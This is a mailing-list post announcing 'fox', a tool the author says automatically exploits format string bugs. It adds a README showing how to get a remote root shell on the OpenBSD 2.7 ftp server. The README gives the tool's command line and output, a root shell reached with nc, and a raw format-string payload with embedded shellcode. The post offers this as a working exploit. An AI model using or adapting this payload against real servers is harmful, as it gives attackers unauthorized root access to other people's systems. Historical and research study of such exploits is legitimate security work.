Re: Howto exploit a remote format bug automatically

[Fredrik Widlund <fredrik.widlund () defcom com>]

Hi

"fox", a tool I wrote for automatically exploiting any (or most) format bugs, 
locally and remotely. Runs on OpenBSD and not ported to other platforms, 
though it should be very straighforward. 

The only requirement is that you get the actual printed string back to the 
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a 
small shell program since the output occurs in the process listing.

Should work for exploiting bugs on most little-endian 32bit-machines like the 
i386 providing you supply the shellcode.

Includes a trivial local example, and an example of how to point it at the 
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.

Regards,
Fredrik Widlund

-x-

README for example 2:
Exploiting OpenBSD 2.7 ftp server

Input has to be < 256 characters, working offsets are -18 and -2
Ex:

root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2
alignment               0
chars before argument   111
chars before insert     0
argument offset         9
argument pointer offset 0
argument address        0xdfbfd15c
esp                     0xdfbfd138

uid=0(root) gid=0(wheel) groups=0(wheel)
root@wolf> nc 127.0.0.1 21
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD wolf 2.7 GENERIC#0 i386
cat /etc/hosts
127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿
<81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K
<83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª
<81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx
exit
root@wolf>

Attachment: fox0.1.tgz
Description: format bug exploiter